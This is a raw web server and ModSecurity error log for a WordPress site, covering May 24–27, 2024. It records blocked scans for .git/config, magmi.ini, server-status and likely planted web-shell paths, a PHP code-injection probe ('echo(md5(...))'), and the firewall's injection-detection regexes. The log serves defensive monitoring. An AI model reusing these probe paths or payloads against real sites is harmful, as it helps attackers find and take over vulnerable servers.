"960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/magmi/conf/magmi.ini"] [unique_id "ZlCSwySU2Q1DR04S3W3G5AAAAIA"] [Fri May 24 08:14:43.336186 2024] [:error] [pid 1791:tid 140233886586624] [client 161.97.165.57:33160] [client 161.97.165.57] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/shop/magmi/conf/magmi.ini"] [unique_id "ZlCSw8Gh4pjj9bsoAucO5QAAANI"] 2024/05/24 11:31:00 [error] 1526#1526: *50033 access forbidden by rule, client: 35.86.109.59, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri May 24 15:09:35.320010 2024] [autoindex:error] [pid 22882:tid 140233920157440] [client 4.227.102.74:43962] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat May 25 01:09:01.539851 2024] [authz_core:error] [pid 22882:tid 140233878193920] [client 142.93.129.190:41062] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/25 01:09:06 [error] 1527#1527: *66380 access forbidden by rule, client: 142.93.129.190, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat May 25 03:37:29.135117 2024] [ssl:warn] [pid 4849:tid 140626820929408] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 25 03:37:37.368264 2024] [ssl:warn] [pid 4854:tid 140626820929408] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 25 03:37:37.926300 2024] [ssl:warn] [pid 4854:tid 140626820929408] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 25 03:37:40.176005 2024] [ssl:warn] [pid 4854:tid 140626820929408] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 25 03:37:42.455611 2024] [ssl:warn] [pid 5275:tid 140615507371904] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 25 03:37:54.690764 2024] [ssl:warn] [pid 5278:tid 140615507371904] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 25 06:10:45.066274 2024] [:error] [pid 5297:tid 140615090112256] [client 178.159.37.38:52016] [client 178.159.37.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZlHHNc1HXOswzv49u41hfgAAAJM"], referer: www.google.com [Sat May 25 06:10:45.928173 2024] [:error] [pid 5297:tid 140615115290368] [client 178.159.37.38:52022] [client 178.159.37.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZlHHNc1HXOswzv49u41hgAAAAJA"], referer: www.google.com [Sat May 25 06:22:06.511862 2024] [authz_core:error] [pid 5919:tid 140615182432000] [client 164.92.107.174:53692] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/25 06:22:13 [error] 5257#5257: *70295 access forbidden by rule, client: 164.92.107.174, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat May 25 09:04:17.613694 2024] [authz_core:error] [pid 5919:tid 140615064934144] [client 178.128.207.138:59094] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/25 09:04:21 [error] 5256#5256: *72220 access forbidden by rule, client: 178.128.207.138, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat May 25 11:27:49.729005 2024] [authz_core:error] [pid 5919:tid 140615123683072] [client 142.93.0.66:34634] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/25 11:27:54 [error] 5257#5257: *73622 access forbidden by rule, client: 142.93.0.66, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat May 25 16:00:40.898977 2024] [:error] [pid 5296:tid 140615123683072] [client 89.117.60.222:41360] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Sat May 25 16:00:57.461792 2024] [:error] [pid 5296:tid 140615140468480] [client 89.117.60.222:41396] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat May 25 16:00:57.583241 2024] [:error] [pid 5295:tid 140615316231936] [client 89.117.60.222:41398] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat May 25 16:01:45.847275 2024] [autoindex:error] [pid 5295:tid 140615307839232] [client 89.117.60.222:41506] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat May 25 16:01:57.405454 2024] [:error] [pid 5919:tid 140615115290368] [client 89.117.60.222:41532] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat May 25 16:01:58.335909 2024] [autoindex:error] [pid 5919:tid 140615064934144] [client 89.117.60.222:41536] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat May 25 16:01:59.474650 2024] [autoindex:error] [pid 5919:tid 140615056541440] [client 89.117.60.222:41540] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat May 25 16:02:07.361958 2024] [:error] [pid 5296:tid 140615090112256] [client 89.117.60.222:41568] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sat May 25 16:02:07.470916 2024] [:error] [pid 5295:tid 140615090112256] [client 89.117.60.222:41570] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sat May 25 16:02:52.152464 2024] [:error] [pid 5919:tid 140615090112256] [client 89.117.60.222:41690] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Sat May 25 16:03:10.127706 2024] [:error] [pid 5295:tid 140615316231936] [client 89.117.60.222:41766] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat May 25 16:03:10.274673 2024] [:error] [pid 5297:tid 140615140468480] [client 89.117.60.222:41768] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat May 25 16:04:00.985548 2024] [autoindex:error] [pid 5296:tid 140615123683072] [client 89.117.60.222:41862] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat May 25 16:04:12.640958 2024] [:error] [pid 5297:tid 140615056541440] [client 89.117.60.222:41894] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat May 25 16:04:13.595170 2024] [autoindex:error] [pid 5297:tid 140615081719552] [client 89.117.60.222:41898] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat May 25 16:04:14.602729 2024] [autoindex:error] [pid 5297:tid 140615090112256] [client 89.117.60.222:41902] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat May 25 16:04:21.543877 2024] [:error] [pid 5297:tid 140615140468480] [client 89.117.60.222:41922] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sat May 25 16:04:21.675578 2024] [:error] [pid 5297:tid 140615324624640] [client 89.117.60.222:41924] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sat May 25 18:39:13.326042 2024] [:error] [pid 5919:tid 140615081719552] [client 5.188.62.140:45806] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZlJ2oQQhtfwQS_KuS6srxQAAANQ"] [Sat May 25 19:09:20.405529 2024] [:error] [pid 5919:tid 140615299446528] [client 5.188.62.140:46286] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZlJ9sAQhtfwQS_KuS6sr5QAAAMM"] [Sun May 26 00:46:07.674314 2024] [authz_core:error] [pid 5919:tid 140615140468480] [client 64.226.78.121:54132] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/26 00:46:11 [error] 5257#5257: *81405 access forbidden by rule, client: 64.226.78.121, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun May 26 03:09:20.387868 2024] [ssl:warn] [pid 28780:tid 140271637239680] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 26 03:09:28.607218 2024] [ssl:warn] [pid 28787:tid 140271637239680] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 26 03:09:29.267342 2024] [ssl:warn] [pid 28787:tid 140271637239680] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 26 03:09:31.834914 2024] [ssl:warn] [pid 28787:tid 140271637239680] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 26 03:09:34.133030 2024] [ssl:warn] [pid 29203:tid 140189808568192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 26 03:09:42.356436 2024] [ssl:warn] [pid 29205:tid 140189808568192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 26 03:31:14.794343 2024] [autoindex:error] [pid 29603:tid 140189351446272] [client 139.59.31.231:58520] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2024/05/26 05:19:44 [error] 29185#29185: *84341 access forbidden by rule, client: 79.120.76.144, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/05/26 06:26:37 [error] 29185#29185: *85196 access forbidden by rule, client: 104.234.204.144, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun May 26 09:55:54.174214 2024] [authz_core:error] [pid 29227:tid 140189510907648] [client 138.197.191.87:41012] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/26 09:55:58 [error] 29185#29185: *87766 access forbidden by rule, client: 138.197.191.87, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun May 26 12:00:15.542540 2024] [:error] [pid 29225:tid 140189385017088] [client 46.21.198.186:43818] [client 46.21.198.186] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:msfacai. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:msfacai: echo(md5(573825));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/fing/zjxd.php"] [unique_id "ZlNqn_FdkKgsxM-aSm1NfAAAABQ"] [Sun May 26 12:00:15.911377 2024] [:error] [pid 29225:tid 140189376624384] [client 46.21.198.186:43820] [client 46.21.198.186] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:msfacai. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:msfacai: echo(md5(573825));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/classic-editor/js/block-editor-plugin.php"] [unique_id "ZlNqn_FdkKgsxM-aSm1NfQAAABU"] [Sun May 26 12:00:16.304642 2024] [:error] [pid 29603:tid 140189452158720] [client 46.21.198.186:43822] [client 46.21.198.186] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:msfacai. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:msfacai: echo(md5(573825));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/ectoplasm/delchel.php"] [unique_id "ZlNqoD9TSdvKP4b7QfBVagAAAMw"] [Sun May 26 12:08:18.661935 2024] [:error] [pid 29226:tid 140189426980608] [client 5.188.62.140:43974] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZlNsgukhBbeWQ7YlDrR5MgAAAE8"] [Sun May 26 12:30:40.126518 2024] [authz_core:error] [pid 29227:tid 140189410195200] [client 167.99.210.137:44494] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/26 12:30:44 [error] 29185#29185: *88997 access forbidden by rule, client: 167.99.210.137, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun May 26 14:53:24.813702 2024] [authz_core:error] [pid 29603:tid 140189410195200] [client 139.59.136.184:47478] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/26 14:53:28 [error] 29185#29185: *90064 access forbidden by rule, client: 139.59.136.184, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun May 26 22:35:30.979431 2024] [authz_core:error] [pid 29227:tid 140189468944128] [client 206.189.19.19:58188] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/26 22:35:34 [error] 29185#29185: *94096 access forbidden by rule, client: 206.189.19.19, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Mon May 27 03:43:19.270728 2024] [ssl:warn] [pid 30149:tid 140426171950976] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 27 03:43:27.615053 2024] [ssl:warn] [pid 30158:tid 140426171950976] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 27 03:43:28.142705 2024] [ssl:warn] [pid 30158:tid 140426171950976] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 27 03:43:30.044894 2024] [ssl:warn] [pid 30158:tid 140426171950976] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 27 03:43:32.357267 2024] [ssl:warn] [pid 30574:tid 140304361146240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 27 03:43:40.650441 2024] [ssl:warn] [pid 30577:tid 140304361146240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 27 09:27:39.137239 2024] [authz_core:error] [pid 31229:tid 140303931455232] [client 165.227.84.14:47548] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/27 09:27:41 [error] 30554#30554: *100769 access forbidden by rule, client: 165.227.84.14, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon May 27 09:28:56.816203 2024] [autoindex:error] [pid 31229:tid 140303981811456] [client 159.223.34.107:47610] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon May 27 14:28:46.993670 2024] [authz_core:error] [pid 30599:tid 140304006989568] [client 23.239.4.252:55676] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/27 14:28:50 [error] 30554#30554: *103982 access forbidden by rule, client: 23.239.4.252, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon May 27 17:37:56.668541 2024] [authz_core:error] [pid 30597:tid 140303981811456] [client 139.162.96.81:33280] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/27 17:38:01 [error] 30554#30554: *105972 access forbidden by rule, client: 139.162.96.81, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/05/27 19:02:08 [error] 30555#30555: *106645 access forbidden by rule, client: 34.211.231.22, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon May 27 20:58:13.962531 2024] [autoindex:error] [pid 30597:tid 140304082523904] [client 159.223.34.107:38126] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon May 27 23:16:16.739472 2024] [:error] [pid 30598:tid 140303906277120] [client 82.208.22.221:41726] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Mon May 27 23:16:32.323767 2024] [:error] [pid 31229:tid 140303998596864] [client 82.208.22.221:41772] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon May 27 23:16:32.443809 2024] [:error] [pid 30597:tid 140303981811456] [client 82.208.22.221:41774] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon May 27 23:17:15.348628 2024] [autoindex:error] [pid 31229:tid 140303990204160] [client 82.208.22.221:41882] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon May 27 23:17:24.930839 2024] [:error] [pid 30599:tid 140303948240640] [client 82.208.22.221:41906] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon May 27 23:17:25.890397 2024] [autoindex:error] [pid 30598:tid 140303956633344] [client 82.208.22.221:41910] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon May 27 23:17:26.726292 2024] [autoindex:error] [pid 30598:tid 140304023774976] [client 82.208.22.221:41914] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon May 27 23:17:33.909459 2024] [:error] [pid 31229:tid 140304057345792] [client 82.208.22.221:41928] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Mon May 27 23:17:34.081075 2024] [:error] [pid 30599:tid 140303965026048] [client 82.208.22.221:41930] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Mon May 27 23:18:21.899898 2024] [:error] [pid 30597:tid 140303998596864] [client 82.208.22.221:42034] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Mon May 27 23:18:37.542388 2024] [:error] [pid 31229:tid 140303973418752] [client 82.208.22.221:42066] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon May 27 23:18:37.707282 2024] [:error] [pid 31229:tid 140303914669824] [client 82.208.22.221:42068] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon May 27 23:19:24.327330 2024] [autoindex:error] [pid 31229:tid 140303981811456] [client 82.208.22.221:42176] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex 